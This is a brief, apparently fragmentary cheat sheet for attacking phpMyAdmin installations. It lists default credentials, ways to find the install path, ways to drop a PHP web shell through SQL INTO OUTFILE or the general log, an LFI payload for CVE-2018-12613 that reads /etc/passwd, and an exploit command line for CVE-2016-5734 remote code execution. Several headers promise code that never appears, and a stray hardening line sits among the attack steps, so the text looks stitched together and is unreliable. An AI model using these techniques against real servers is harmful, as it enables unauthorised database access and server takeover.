Check accessible static text assets such as /README, /ChangeLog, or /RELEASE-DATE-X.X.X.
Default and Weak Credentials: Many installations still use root with no password or common defaults like admin/admin.
Create a malicious .sql file:
Gaining access to the phpMyAdmin dashboard is the most straightforward path to database control.
Ensure the MySQL user used by phpMyAdmin does not have the FILE privilege.
Run the following SQL query in the phpMyAdmin SQL box to drop a PHP web shell:
| Goal | Technique | Prerequisites |
|---|---|---|
| | Scan for /readme.php, /changelog.php | None |
| Login | Default creds (root:root), brute force | None |
| Get path | Single quote error, phpinfo() | None |
| Check write priv | SHOW VARIABLES LIKE 'secure_file_priv' | Authenticated |
| Write shell (outfile) | SELECT '<?php ... ?>' INTO OUTFILE | secure_file_priv empty, path known |
| Write shell (log) | SET GLOBAL general_log_file=... | Root, path known |
| Write shell (table) | Create table with PHP code, include via LFI | LFI vulnerability, path known |
| LFI (CVE-2018-12613) | index.php?target=db_sql.php%253f/../../../etc/passwd | Version 4.8.x |
| RCE (CVE-2016-5734) | python exploit.py -u root -p root -c "system('id');" | Version 4.3.0 – 4.6.2 |
For further research into securing database administration tools, the following areas are recommended for study: